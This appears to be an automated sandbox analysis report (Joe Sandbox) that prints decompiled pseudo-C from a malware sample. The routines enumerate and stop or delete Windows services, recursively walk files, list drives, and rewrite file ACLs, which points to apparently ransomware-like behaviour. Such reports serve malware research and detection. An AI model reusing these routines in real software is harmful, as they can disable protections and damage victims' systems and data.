4108->4050 4109->4108 4110 9c6c30 11 API calls 4109->4110 4111 9c6cf8 4110->4111 4113 9c47f8 4111->4113 4116 9c4795 RtlFreeHeap 4113->4116 4115 9c4809 4115->4108 4116->4115 4118 9c707d 12 API calls 4117->4118 4119 9c7383 LoadLibraryA 4118->4119 4119->4066 5421 9c3927 5422 9c3932 5421->5422 5423 9c3936 5421->5423 5423->5422 5425 9c78c9 PathFindExtensionW 5423->5425 5426 9c78de 5425->5426 5426->5422 5362 9c10c3 5363 9c5c8c 6 API calls 5362->5363 5364 9c10d2 5363->5364 5365 9c5cde 6 API calls 5364->5365 5368 9c10f2 5364->5368 5366 9c10e7 5365->5366 5367 9c47f8 RtlFreeHeap 5366->5367 5367->5368 5427 9c2d63 5428 9c2d7a 5427->5428 5430 9c2d72 5427->5430 5429 9c2db2 lstrlenW GetWindowsDirectoryW PathAddBackslashW 5428->5429 5428->5430 5429->5430

Executed Functions

Control-flow Graph

C-Code - Quality: 41%
E009C3B8E() {
	char _v8;
	char _v12;
	void* _v16;
	struct _SERVICE_STATUS _v20;
	short** _v24;
	short* _v28;
	void _v56;
	struct _SERVICE_STATUS _v60;
	void* _t28;
	struct _SERVICE_STATUS _t37;
	intOrPtr* _t40;
	struct _SERVICE_STATUS _t43;
	struct _SERVICE_STATUS _t45;
	void* _t46;
	int _t50;
	void* _t58;
	signed int _t63;
	void* _t65;
	short** _t67;
	void* _t71;
	struct _SERVICE_STATUS _t72;
	void* _t74;

	_t72 = 0;
	_t28 = OpenSCManagerW(0, L"ServicesActive", 4); // executed
	_t58 = _t28;
	if(_t58 != 0) {
		_push(0);
		_push(0);
		_v8 = 0;
		_push( &_v12);
		_v12 = 0;
		_push( &_v8);
		_push(0);
		_push(0);
		_push(1);
		_push(0x30);
		_push(0);
		_push(_t58);
		if( *0x9d1208() == 0 || RtlGetLastWin32Error() == 0xea) {
			_t67 = E009C47AB(_v8);
			_v24 = _t67;
			if(_t67 != 0) {
				_push(_t72);
				_push(_t72);
				_push( &_v12);
				_push( &_v8);
				_push(_v8);
				_push(_t67);
				_push(1);
				_push(0x30);
				_push(_t72);
				_push(_t58);
				if( *0x9d1208() == 0) {
					L25:
					CloseServiceHandle(_t58);
					_t37 = _t72;
					L26:
					return _t37;
				}
				_v20 = _t72;
				if(_v12 <= _t72) {
					L24:
					_t72 = 1;
					goto L25;
				} else {
					goto L9;
				}
				do {
					L9:
					_v28 =  *_t67;
					E009C6097( *_t67);
					_t40 =  *0x9d2270; // 0x2dd7b08
					while(1) {
						_v16 = _t40;
						if(_t40 == 0) {
							break;
						}
						if(E009C5E4F( *_t40, _v28) != 0) {
							_t43 = 1;
							L14:
							if(_t43 == 0) {
								goto L19;
							}
							_t46 = OpenServiceW(_t58,  *_t67, 0x10020); // executed
							_t65 = _t46;
							_v16 = _t65;
							if(_t65 == 0) {
								goto L24;
							}
							_t63 = 6;
							_v60 = _t72;
							memset( &_v56, 0, _t63 << 2);
							_t74 = _t74 + 0xc;
							_t50 = ControlService(_t65, 1,  &_v60); // executed
							_t71 = _v16;
							_push(_t71);
							if(_t50 == 0) {
								L23:
								CloseServiceHandle();
								goto L24;
							}
							if(DeleteService() == 0) {
								_push(_t71);
								goto L23;
							}
							_t67 = _v24;
							goto L19;
						}
						_t40 =  *((intOrPtr*)(_v16 + 4));
					}
					_t43 = _t72;
					goto L14;
					L19:
					_t67 =  &(_t67[0xb]);
					_t45 = _v20 + 1;
					_v24 = _t67;
                                                                                                                                                            								_v20 = _t45;
                                                                                                                                                            							} while (_t45 < _v12);
                                                                                                                                                            							goto L24;
                                                                                                                                                            						}
                                                                                                                                                            						CloseServiceHandle(_t58);
                                                                                                                                                            						_t37 = 0;
                                                                                                                                                            						goto L26;
                                                                                                                                                            					} else {
                                                                                                                                                            						CloseServiceHandle(_t58);
                                                                                                                                                            						goto L1;
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            				L1:
                                                                                                                                                            				return 0;
                                                                                                                                                            			}


                                                                                                                                                            APIs
                                                                                                                                                            • OpenSCManagerW.SECHOST(00000000,ServicesActive,00000004,00000000), ref: 009C3BA0
                                                                                                                                                            • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000001,00000000,00000000,?,?,00000000,00000000), ref: 009C3BCB
                                                                                                                                                            • RtlGetLastWin32Error.NTDLL ref: 009C3BD5
                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 009C3BE2
                                                                                                                                                              • Part of subcall function 009C47AB: HeapCreate.KERNEL32(00000000,00400000,00000000,?,009C1C60,?,?,009C150C), ref: 009C47C0
                                                                                                                                                              • Part of subcall function 009C47AB: GetProcessHeap.KERNEL32(?,009C1C60,?,?,009C150C), ref: 009C47CF
                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,00000000), ref: 009C3BFE
                                                                                                                                                            • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000001,00000000,?,?,?,00000000,00000000,00000000), ref: 009C3C1F
                                                                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00010020), ref: 009C3C77
                                                                                                                                                            • ControlService.ADVAPI32(00000000,00000001,?), ref: 009C3C9A
                                                                                                                                                            • DeleteService.ADVAPI32(?), ref: 009C3CA8
                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 009C3CDD
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
• Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
• Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
• Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Service$CloseHandle$EnumHeapOpenServicesStatus$ControlCreateDeleteErrorLastManagerProcessWin32
                                                                                                                                                            • String ID: ServicesActive
                                                                                                                                                            • API String ID: 2778422472-3071072050
                                                                                                                                                            • Opcode ID: 1300ecb7af655f9334a14420c89ecdd0f3b9f1ade61b2ac4767e353af0936351
                                                                                                                                                            • Instruction ID: a285d896285ce298b0cb21f0e2149afb0df698949d6e7ff39a0a092e9fbccc85
                                                                                                                                                            • Opcode Fuzzy Hash: 1300ecb7af655f9334a14420c89ecdd0f3b9f1ade61b2ac4767e353af0936351
                                                                                                                                                            • Instruction Fuzzy Hash: 2141BF72E45215BBDB109BA5DC44FAF7BBCEF48750F10C41AF902F2250DB319A40DA61
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

Control-flow Graph (graph starting at 9c761a; node legend: Executed / Not Executed; image not reproduced)
                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                            			E009C761A(WCHAR* _a4, int _a8) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				intOrPtr* _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                            				struct _WIN32_FIND_DATAW _v620;
                                                                                                                                                            				int _t66;
                                                                                                                                                            				signed int _t68;
                                                                                                                                                            				void* _t70;
                                                                                                                                                            				signed int _t73;
                                                                                                                                                            				int _t75;
                                                                                                                                                            				signed int _t77;
                                                                                                                                                            				intOrPtr _t82;
                                                                                                                                                            				signed int _t84;
                                                                                                                                                            				void* _t86;
                                                                                                                                                            				signed int _t89;
                                                                                                                                                            				void* _t93;
                                                                                                                                                            				signed int _t98;
                                                                                                                                                            				signed int _t99;
                                                                                                                                                            				intOrPtr* _t103;
                                                                                                                                                            				void* _t104;
                                                                                                                                                            				signed int _t112;
                                                                                                                                                            				int _t119;
                                                                                                                                                            				signed int* _t120;
                                                                                                                                                            				WCHAR* _t121;
                                                                                                                                                            				intOrPtr* _t122;
                                                                                                                                                            				intOrPtr* _t123;
                                                                                                                                                            				intOrPtr* _t124;
                                                                                                                                                            
                                                                                                                                                            				_t121 = _a4;
                                                                                                                                                            				_t120 = _a8;
                                                                                                                                                            				_t103 = 0;
                                                                                                                                                            				_v8 = 0;
                                                                                                                                                            				_v12 = 0;
                                                                                                                                                            				_v20 = 0;
                                                                                                                                                            				_v16 = 0;
                                                                                                                                                            				_t120[1](_t121, 0);
                                                                                                                                                            				if(0 == 0) {
                                                                                                                                                            					goto L24;
                                                                                                                                                            				} else {
                                                                                                                                                            					E009C78F4( &_v20, _t121);
                                                                                                                                                            					_t9 =  &(_t120[3]); // 0x9777af8, executed
                                                                                                                                                            					_t66 = _t120[0xa]( *_t9, _t121, 0);
                                                                                                                                                            					_t124 = _t124 + 0x14;
                                                                                                                                                            					_t120[6] = _t120[6] + _t66;
                                                                                                                                                            					asm("adc [edi+0x1c], edx");
                                                                                                                                                            					L23:
                                                                                                                                                            					_t103 = _v12;
                                                                                                                                                            					L24:
                                                                                                                                                            					while( *_t120 == 0) {
                                                                                                                                                            						_t66 = _v20 | _v16;
                                                                                                                                                            						__eflags = _t66;
                                                                                                                                                            						if(_t66 != 0) {
                                                                                                                                                            							E009C61A7(_t121,  *_t103);
                                                                                                                                                            							_t123 = _t103;
                                                                                                                                                            							_t103 =  *((intOrPtr*)(_t103 + 4));
                                                                                                                                                            							_v12 = _t103;
                                                                                                                                                            							E009C47F8( *_t123);
                                                                                                                                                            							E009C47F8(_t123);
                                                                                                                                                            							_t124 = _t124 + 0x10;
                                                                                                                                                            							_t112 = _v16;
                                                                                                                                                            							_t98 = _v20 + 0xffffffff;
                                                                                                                                                            							_v20 = _t98;
                                                                                                                                                            							asm("adc ecx, 0xffffffff");
                                                                                                                                                            							_t99 = _t98 | _t112;
                                                                                                                                                            							__eflags = _t99;
                                                                                                                                                            							_v16 = _t112;
                                                                                                                                                            							if(_t99 == 0) {
                                                                                                                                                            								_t21 =  &_v8;
                                                                                                                                                            								 *_t21 = _v8 & _t99;
                                                                                                                                                            								__eflags =  *_t21;
                                                                                                                                                            							}
                                                                                                                                                            							_t121 = _a4;
                                                                                                                                                            							_t66 = 1;
                                                                                                                                                            							__eflags = 1;
                                                                                                                                                            						}
                                                                                                                                                            						__eflags = _t66;
                                                                                                                                                            						if(_t66 == 0) {
                                                                                                                                                            							L27:
                                                                                                                                                            							while(_t103 != 0) {
                                                                                                                                                            								_t122 = _t103;
                                                                                                                                                            								_t103 =  *((intOrPtr*)(_t103 + 4));
                                                                                                                                                            								E009C47F8( *_t122);
                                                                                                                                                            								_t66 = E009C47F8(_t122);
                                                                                                                                                            							}
                                                                                                                                                            							return _t66;
                                                                                                                                                            						}
                                                                                                                                                            						_t68 = E009C6250(_t121);
                                                                                                                                                            						 *_t124 = 0x9cd2e8;
                                                                                                                                                            						_push(_t121);
                                                                                                                                                            						_v24 = _t68;
                                                                                                                                                            						E009C60C5(__eflags);
                                                                                                                                                            						_t70 = E009C5387();
                                                                                                                                                            						__eflags = _t70 - 0x601;
                                                                                                                                                            						if(_t70 < 0x601) {
                                                                                                                                                            							_t66 = FindFirstFileW(_t121,  &_v620);
                                                                                                                                                            						} else {
                                                                                                                                                            							_t66 = FindFirstFileExW(_t121, 1,  &_v620, 0, 0, 2); // executed
                                                                                                                                                            						}
                                                                                                                                                            						_a8 = _t66;
                                                                                                                                                            						__eflags = _t66 - 0xffffffff;
                                                                                                                                                            						if(_t66 == 0xffffffff) {
                                                                                                                                                            							continue;
                                                                                                                                                            						} else {
                                                                                                                                                            							_t104 = _t66;
                                                                                                                                                            							while(1) {
                                                                                                                                                            								_t73 = E009C6146( &(_v620.cFileName), ".");
                                                                                                                                                            								__eflags = _t73;
                                                                                                                                                            								if(_t73 != 0) {
                                                                                                                                                            									_t77 = E009C6146( &(_v620.cFileName), 0x9cd2e0);
                                                                                                                                                            									__eflags = _t77;
                                                                                                                                                            									if(_t77 != 0) {
                                                                                                                                                            										__eflags = _v620.dwFileAttributes & 0x00000400;
                                                                                                                                                            										if((_v620.dwFileAttributes & 0x00000400) == 0) {
                                                                                                                                                            											E009C61A7( &(_t121[_v24]),  &(_v620.cFileName));
                                                                                                                                                            											__eflags = _v620.dwFileAttributes & 0x00000010;
                                                                                                                                                            											if(__eflags == 0) {
                                                                                                                                                            												_t119 = _v620.nFileSizeHigh;
                                                                                                                                                            												_t82 = _v620.nFileSizeLow;
                                                                                                                                                            												_v28 = _t82;
                                                                                                                                                            												_a8 = _t119;
                                                                                                                                                            												_t84 = _t120[2](_t121,  &(_v620.cFileName), _t82, _t119);
                                                                                                                                                            												_t124 = _t124 + 0x10;
                                                                                                                                                            												__eflags = _t84;
                                                                                                                                                            												if(_t84 != 0) {
                                                                                                                                                            													_t56 =  &(_t120[4]); // 0xffdf25, executed
                                                                                                                                                            													_t86 = _t120[0xb]( *_t56, _t121,  &(_v620.cFileName), _v28, _a8);
                                                                                                                                                            													_t124 = _t124 + 0x14;
                                                                                                                                                            													_t120[8] = _t120[8] + _t86;
                                                                                                                                                            													asm("adc [edi+0x24], edx");
                                                                                                                                                            												}
                                                                                                                                                            											} else {
                                                                                                                                                            												E009C60C5(__eflags, _t121, 0x9cd2ec);
                                                                                                                                                            												_t89 = _t120[1](_t121,  &(_v620.cFileName));
                                                                                                                                                            												_t124 = _t124 + 0x10;
                                                                                                                                                            												__eflags = _t89;
                                                                                                                                                            												if(_t89 != 0) {
                                                                                                                                                            													E009C78F4( &_v20, _t121);
                                                                                                                                                            													_t43 =  &(_t120[3]); // 0x9777af8, executed
                                                                                                                                                            													_t93 = _t120[0xa]( *_t43, _t121,  &(_v620.cFileName));
                                                                                                                                                            													_t124 = _t124 + 0x14;
                                                                                                                                                            													_t120[6] = _t120[6] + _t93;
                                                                                                                                                            													asm("adc [edi+0x1c], edx");
                                                                                                                                                            												}
                                                                                                                                                            											}
                                                                                                                                                            										}
                                                                                                                                                            									}
                                                                                                                                                            								}
                                                                                                                                                            								__eflags =  *_t120;
                                                                                                                                                            								if( *_t120 != 0) {
                                                                                                                                                            									break;
                                                                                                                                                            								}
                                                                                                                                                            								_t75 = FindNextFileW(_t104,  &_v620); // executed
                                                                                                                                                            								__eflags = _t75;
                                                                                                                                                            								if(_t75 != 0) {
                                                                                                                                                            									continue;
                                                                                                                                                            								}
                                                                                                                                                            								break;
                                                                                                                                                            							}
                                                                                                                                                            							_t66 = FindClose(_t104);
                                                                                                                                                            							goto L23;
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            					goto L27;
                                                                                                                                                            				}
                                                                                                                                                            			}

































                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 8fc5f4e5d377e6339153ef74c9cf455aa6fb9f055941c9602cfc18f60f329563
                                                                                                                                                            • Instruction ID: b0eb6f3323695a38a0432c949a3feb559e9b4303ed37b5e3a0c4217e265776e5
                                                                                                                                                            • Opcode Fuzzy Hash: 8fc5f4e5d377e6339153ef74c9cf455aa6fb9f055941c9602cfc18f60f329563
                                                                                                                                                            • Instruction Fuzzy Hash: 6C618071D0461AABDB10AFA4CC89FAEB7BCFF05320F50456AF914E2141E7359A50CFA2
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 509 9c5907-9c5916 timeBeginPeriod timeGetTime 510 9c5918-9c5928 Sleep timeGetTime 509->510 510->510 511 9c592a-9c592b 510->511
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C5907() {
                                                                                                                                                            				long _t3;
                                                                                                                                                            				long _t4;
                                                                                                                                                            
                                                                                                                                                            				timeBeginPeriod(1);
                                                                                                                                                            				_t4 = timeGetTime();
                                                                                                                                                            				do {
                                                                                                                                                            					Sleep(1); // executed
                                                                                                                                                            					_t3 = timeGetTime();
                                                                                                                                                            				} while (_t4 == _t3);
                                                                                                                                                            				return _t3;
                                                                                                                                                            			}






                                                                                                                                                            APIs
                                                                                                                                                            • timeBeginPeriod.WINMM(00000001,?,009C5873,00000000,00000000,00000000,?,00000030,00000000,?,?,009C67D8,?,00000020,00000000), ref: 009C590A
                                                                                                                                                            • timeGetTime.WINMM(?,009C67D8,?,00000020,00000000,?,009C6781,?,?,009C24CB,?,009D2120), ref: 009C5910
                                                                                                                                                            • Sleep.KERNEL32(00000001,?,009C67D8,?,00000020,00000000,?,009C6781,?,?,009C24CB,?,009D2120), ref: 009C591A
                                                                                                                                                            • timeGetTime.WINMM(?,009C67D8,?,00000020,00000000,?,009C6781,?,?,009C24CB,?,009D2120), ref: 009C5920
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: time$Time$BeginPeriodSleep
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4118631919-0
                                                                                                                                                            • Opcode ID: 69aa7864394fc499a80eba6f4c33b6be63ce374a33522e33c2aa4e4f6cf6ffea
                                                                                                                                                            • Instruction ID: dff80598bacc0f0d717cbbd4714b2667290b4475da70542b8e37d039a362fc1c
                                                                                                                                                            • Opcode Fuzzy Hash: 69aa7864394fc499a80eba6f4c33b6be63ce374a33522e33c2aa4e4f6cf6ffea
                                                                                                                                                            • Instruction Fuzzy Hash: E2C012334EA061AFD3103720FF0D7D93B559B00352F414252F666C60B28A610CC0AAE1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C4C0D(signed int* _a4) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				int _v12;
                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                            				short _v20;
                                                                                                                                                            				union _ULARGE_INTEGER _v28;
                                                                                                                                                            				intOrPtr _t23;
                                                                                                                                                            				int _t31;
                                                                                                                                                            				short _t34;
                                                                                                                                                            				long _t40;
                                                                                                                                                            				void* _t41;
                                                                                                                                                            				short _t42;
                                                                                                                                                            				void* _t45;
                                                                                                                                                            				signed int _t46;
                                                                                                                                                            				void* _t47;
                                                                                                                                                            				union _ULARGE_INTEGER* _t49;
                                                                                                                                                            				signed int _t50;
                                                                                                                                                            
                                                                                                                                                            				_t46 = 0;
                                                                                                                                                            				_t50 = 0;
                                                                                                                                                            				_v8 = 0;
                                                                                                                                                            				_t41 = 0;
                                                                                                                                                            				_t47 = 0x5a;
                                                                                                                                                            				L1:
                                                                                                                                                            				while(1) {
                                                                                                                                                            					if(_t41 == 0) {
                                                                                                                                                            						L5:
                                                                                                                                                            						_t42 =  *0x9cd178; // 0x3a0041
                                                                                                                                                            						_t23 =  *0x9cd17c; // 0x5c
                                                                                                                                                            						_v20 = _t42;
                                                                                                                                                            						_v16 = _t23;
                                                                                                                                                            						if(_t42 > _t47) {
                                                                                                                                                            							L14:
                                                                                                                                                            							_t46 = _v8;
                                                                                                                                                            							_t41 = _t41 + 1;
                                                                                                                                                            							if(_t41 > 1) {
                                                                                                                                                            								L17:
                                                                                                                                                            								return _t46;
                                                                                                                                                            							}
                                                                                                                                                            							continue;
                                                                                                                                                            						}
                                                                                                                                                            						_t6 = _t46 + 0xe; // 0xe
                                                                                                                                                            						_t49 = _t6 + _t50 * 0x16;
                                                                                                                                                            						do {
                                                                                                                                                            							_t31 = GetDriveTypeW( &_v20); // executed
                                                                                                                                                            							_v12 = _t31;
                                                                                                                                                            							if(E009C78B6(_t31) != 0) {
                                                                                                                                                            								if(_t41 != 0) {
                                                                                                                                                            									 *((short*)(_t49 - 0xe)) = _v20;
                                                                                                                                                            									 *(_t49 - 0xc) = _v12;
                                                                                                                                                            									_t13 = _t49 - 8; // 0x6
                                                                                                                                                            									_t40 = GetDiskFreeSpaceExW( &_v20,  &_v28, _t13, _t49); // executed
                                                                                                                                                            									if(_t40 == 0) {
                                                                                                                                                            										_t49->LowPart = _t40;
                                                                                                                                                            										_t49->LowPart.HighPart = _t40;
                                                                                                                                                            										 *(_t49 - 8) = _t40;
                                                                                                                                                            										 *(_t49 - 4) = _t40;
                                                                                                                                                            									}
                                                                                                                                                            								}
                                                                                                                                                            								_t50 = _t50 + 1;
                                                                                                                                                            								_t49 = _t49 + 0x16;
                                                                                                                                                            							}
                                                                                                                                                            							_t34 = _v20 + 1;
                                                                                                                                                            							_t45 = 0x5a;
                                                                                                                                                            							_v20 = _t34;
                                                                                                                                                            						} while (_t34 <= _t45);
                                                                                                                                                            						_t47 = _t45;
                                                                                                                                                            						goto L14;
                                                                                                                                                            					}
                                                                                                                                                            					if(_t50 == 0) {
                                                                                                                                                            						L16:
                                                                                                                                                            						 *_a4 =  *_a4 & 0x00000000;
                                                                                                                                                            						goto L17;
                                                                                                                                                            					}
                                                                                                                                                            					_t46 = E009C47AB(_t50 * 0x16);
                                                                                                                                                            					_v8 = _t46;
                                                                                                                                                            					if(_t46 == 0) {
                                                                                                                                                            						goto L16;
                                                                                                                                                            					}
                                                                                                                                                            					 *_a4 = _t50;
                                                                                                                                                            					_t50 = 0;
                                                                                                                                                            					goto L5;
                                                                                                                                                            				}
                                                                                                                                                            			}




















                                                                                                                                                            APIs
                                                                                                                                                            • GetDriveTypeW.KERNEL32(?,0000000A,00000000,009D0270,?,?,?,?,009C1A35,?), ref: 009C4C6E
                                                                                                                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,00000006,0000000E,?,?,?,?,009C1A35,?), ref: 009C4CA1
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: DiskDriveFreeSpaceType
                                                                                                                                                            • String ID: A:\
                                                                                                                                                            • API String ID: 1419299958-3379428675
                                                                                                                                                            • Opcode ID: ae7cc7bdd94eb12da1cdaddc3ec69d341b71c5aba54098bd21d88d7a0c1e3d7a
                                                                                                                                                            • Instruction ID: 3e9b8b85d4bc015671b272a2f919577192cfc8fabe529194bf161be5468b5a88
                                                                                                                                                            • Opcode Fuzzy Hash: ae7cc7bdd94eb12da1cdaddc3ec69d341b71c5aba54098bd21d88d7a0c1e3d7a
                                                                                                                                                            • Instruction Fuzzy Hash: 4A218F76E452169BD714DFA9C890FEFF7BCFB84710B14822AE944D7250E73089418B91
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 37%
                                                                                                                                                            			E009C4A20(void* __ecx, intOrPtr _a4) {
                                                                                                                                                            				short _v8;
                                                                                                                                                            				struct _SID_IDENTIFIER_AUTHORITY _v12;
                                                                                                                                                            				void* _t8;
                                                                                                                                                            				signed int _t11;
                                                                                                                                                            				signed int _t13;
                                                                                                                                                            				void* _t16;
                                                                                                                                                            				void* _t21;
                                                                                                                                                            				signed int _t22;
                                                                                                                                                            				void* _t25;
                                                                                                                                                            				int _t31;
                                                                                                                                                            
                                                                                                                                                            				_v8 = 0x100;
                                                                                                                                                            				_v12.Value = 0;
                                                                                                                                                            				_t31 =  *0x9d1d58; // 0x501
                                                                                                                                                            				if(_t31 != 0) {
                                                                                                                                                            					L5:
                                                                                                                                                            					_t8 =  *0x9d10b4(_a4, 1, 4, 0, 0,  *0x9d1d2c, 0); // executed
                                                                                                                                                            					_t21 = _t8;
                                                                                                                                                            					if(_t21 != 0) {
                                                                                                                                                            						_t11 = (0 | _t21 == 0x00000005) - 1;
                                                                                                                                                            					} else {
                                                                                                                                                            						_t11 = 1;
                                                                                                                                                            					}
                                                                                                                                                            					L8:
                                                                                                                                                            					return _t11;
                                                                                                                                                            				}
                                                                                                                                                            				_t13 = AllocateAndInitializeSid( &_v12, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0x9d1d28);
                                                                                                                                                            				if(_t13 != 0) {
                                                                                                                                                            					_t22 = 8;
                                                                                                                                                            					memset(0x9d1d5c, 0, _t22 << 2);
                                                                                                                                                            					_t16 =  *0x9d1d28; // 0xb70f78
                                                                                                                                                            					 *0x9d1d5c = 0x10000000;
                                                                                                                                                            					 *0x9d1d60 = 2;
                                                                                                                                                            					 *0x9d1d64 = 3;
                                                                                                                                                            					 *0x9d1d70 = 0;
                                                                                                                                                            					 *0x9d1d74 = 5;
                                                                                                                                                            					 *0x9d1d78 = _t16;
                                                                                                                                                            					_t13 =  *0x9d1014(1, 0x9d1d5c, 0, 0x9d1d2c, _t25);
                                                                                                                                                            					if(_t13 != 0) {
                                                                                                                                                            						goto L2;
                                                                                                                                                            					}
                                                                                                                                                            					 *0x9d1d58 = 1;
                                                                                                                                                            					goto L5;
                                                                                                                                                            				}
                                                                                                                                                            				L2:
                                                                                                                                                            				_t11 = _t13 | 0xffffffff;
                                                                                                                                                            				goto L8;
                                                                                                                                                            			}














                                                                                                                                                            APIs
                                                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,009D1D28,?,?,?,?,009C561A), ref: 009C4A50
                                                                                                                                                            • SetEntriesInAclW.ADVAPI32(00000001,009D1D5C,00000000,009D1D2C,?,?,?,?,?,009C561A,?,?,?,009C2D35,?,00000001), ref: 009C4AB2
                                                                                                                                                            • SetNamedSecurityInfoW.ADVAPI32(?,00000001,00000004,00000000,00000000,00000000,?,?,?,?,009C561A,?,?,?,009C2D35,?), ref: 009C4AD7
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocateEntriesInfoInitializeNamedSecurity
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2342141041-0
                                                                                                                                                            • Opcode ID: 9cfd97282db3f1089257be270856369000253a4f40fca233c764cbc92cd38e5d
                                                                                                                                                            • Instruction ID: dfbce4274974ad2c75c1445d382393dcf0744e64796a3394283844a7bae40cc7
                                                                                                                                                            • Opcode Fuzzy Hash: 9cfd97282db3f1089257be270856369000253a4f40fca233c764cbc92cd38e5d
                                                                                                                                                            • Instruction Fuzzy Hash: F81190B67E9208BFFB108F61EC95F6637AEE744398F10412EF111861E0D7B148C09711
                                                                                                                                                            Uniqueness

